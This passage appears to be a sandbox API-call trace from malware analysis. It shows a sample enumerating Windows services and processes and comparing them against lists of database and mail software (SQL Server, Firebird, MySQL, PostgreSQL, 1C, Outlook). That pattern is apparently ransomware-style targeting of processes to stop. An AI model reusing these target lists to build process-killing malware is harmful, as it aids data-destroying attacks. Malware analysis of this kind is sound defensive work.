(lpString1="sqlwriter", lpString2="CscService") returned 1 [0262.761] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0262.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0262.761] lstrlenW (lpString="DcomLaunch") returned 10 [0262.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0262.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0262.761] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0262.761] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0262.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0262.761] lstrlenW (lpString="Dhcp") returned 4 [0262.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0262.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0262.761] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0262.761] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0262.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0262.761] lstrlenW (lpString="Dnscache") returned 8 [0262.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0262.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0262.761] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0262.761] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0262.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0262.762] lstrlenW (lpString="eventlog") returned 8 [0262.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0262.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0262.762] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0262.762] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0262.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0262.762] lstrlenW (lpString="EventSystem") returned 11 [0262.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0262.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0262.762] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0262.762] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0262.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0262.762] lstrlenW (lpString="gpsvc") returned 5 [0262.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0262.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0262.762] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0262.762] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0262.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0262.762] lstrlenW (lpString="lmhosts") returned 7 [0262.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0262.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0262.762] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0262.762] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0262.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0262.762] lstrlenW (lpString="MMCSS") returned 5 [0262.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0262.762] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0262.762] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0262.762] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0262.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0262.762] lstrlenW (lpString="MpsSvc") returned 6 [0262.762] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0262.763] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0262.763] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0262.763] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0262.763] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0262.763] lstrlenW (lpString="nsi") returned 3 [0262.763] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0262.763] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0262.763] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0262.763] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0262.763] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0262.763] lstrlenW (lpString="PlugPlay") returned 8 [0262.763] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0262.763] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0262.763] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0262.763] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0262.763] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0262.763] lstrlenW (lpString="Power") returned 5 [0262.763] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0262.763] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0262.763] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0262.763] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0262.763] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0262.763] lstrlenW (lpString="ProfSvc") returned 7 [0262.763] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0262.763] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0262.763] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0262.763] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0262.763] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0262.763] lstrlenW (lpString="RpcEptMapper") returned 12 [0262.763] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0262.763] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0262.763] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0262.764] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0262.764] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0262.764] lstrlenW (lpString="RpcSs") returned 5 [0262.764] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0262.764] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0262.764] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0262.764] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0262.764] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0262.764] lstrlenW (lpString="SamSs") returned 5 [0262.764] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0262.764] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0262.764] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0262.764] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0262.764] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0262.764] lstrlenW (lpString="Schedule") returned 8 [0262.764] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0262.764] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0262.764] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0262.764] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0262.764] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0262.764] lstrlenW (lpString="SENS") returned 4 [0262.764] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0262.764] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0262.764] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0262.764] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0262.764] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0262.764] lstrlenW (lpString="ShellHWDetection") returned 16 [0262.764] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0262.764] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0262.764] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0262.764] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0262.765] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0262.765] lstrlenW (lpString="Spooler") returned 7 [0262.765] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0262.765] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0262.765] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0262.765] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0262.765] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0262.765] lstrlenW (lpString="Themes") returned 6 [0262.765] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0262.765] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0262.765] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0262.765] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0262.765] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0262.765] lstrlenW (lpString="UxSms") returned 5 [0262.765] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0262.765] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0262.765] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0262.765] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0262.765] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0262.765] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5e5e18 | out: hHeap=0x520000) returned 1 [0262.765] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x130 [0262.766] Process32FirstW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.766] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0262.766] lstrlenW (lpString="System") returned 6 [0262.766] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0262.766] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0262.766] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0262.766] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0262.766] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0262.766] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0262.767] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0262.767] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0262.767] lstrlenW (lpString="smss.exe") returned 8 [0262.767] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0262.767] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0262.767] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0262.767] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0262.767] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0262.767] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0262.767] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0262.767] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0262.767] lstrlenW (lpString="csrss.exe") returned 9 [0262.767] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0262.767] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0262.767] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0262.767] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0262.767] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0262.767] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0262.767] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0262.767] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0262.768] lstrlenW (lpString="wininit.exe") returned 11 [0262.768] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0262.768] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0262.768] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0262.768] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0262.768] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0262.768] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0262.768] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0262.768] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0262.768] lstrlenW (lpString="csrss.exe") returned 9 [0262.768] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0262.768] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0262.768] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0262.768] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0262.768] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0262.768] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0262.768] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0262.768] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0262.769] lstrlenW (lpString="winlogon.exe") returned 12 [0262.769] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0262.769] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0262.769] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0262.769] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0262.769] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0262.769] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0262.769] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0262.769] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0262.769] lstrlenW (lpString="services.exe") returned 12 [0262.769] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0262.769] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0262.769] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0262.769] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0262.769] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0262.769] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0262.769] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0262.769] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0262.769] lstrlenW (lpString="lsass.exe") returned 9 [0262.770] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0262.770] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0262.770] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0262.770] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0262.770] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0262.770] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0262.770] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0262.770] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0262.770] lstrlenW (lpString="lsm.exe") returned 7 [0262.770] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0262.770] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0262.770] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0262.770] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0262.770] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0262.770] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0262.770] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0262.770] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.770] lstrlenW (lpString="svchost.exe") returned 11 [0262.770] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.770] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.771] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.771] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.771] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.771] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.771] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0262.771] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.771] lstrlenW (lpString="svchost.exe") returned 11 [0262.771] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.771] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.771] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.771] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.771] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.771] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.771] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0262.771] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.771] lstrlenW (lpString="svchost.exe") returned 11 [0262.771] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.771] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.771] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.771] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.771] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.772] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.772] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0262.772] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.772] lstrlenW (lpString="svchost.exe") returned 11 [0262.772] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.772] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.772] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.772] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.772] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.772] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.772] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0262.772] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.772] lstrlenW (lpString="svchost.exe") returned 11 [0262.773] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.773] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.773] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.773] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.773] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.773] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.773] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0262.773] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0262.773] lstrlenW (lpString="audiodg.exe") returned 11 [0262.773] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0262.773] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0262.773] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0262.773] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0262.773] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0262.773] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0262.773] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0262.773] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.773] lstrlenW (lpString="svchost.exe") returned 11 [0262.774] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.774] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.774] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.774] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.774] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.774] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.774] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0262.774] Process32NextW (in: hSnapshot=0x130, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.774] lstrlenW (lpString="svchost.exe") returned 11 [0262.774] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0262.774] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0262.774] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0262.774] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0262.774] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0262.774] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0262.774] lstrcmpiW (lpString1="sqlservr.exe", 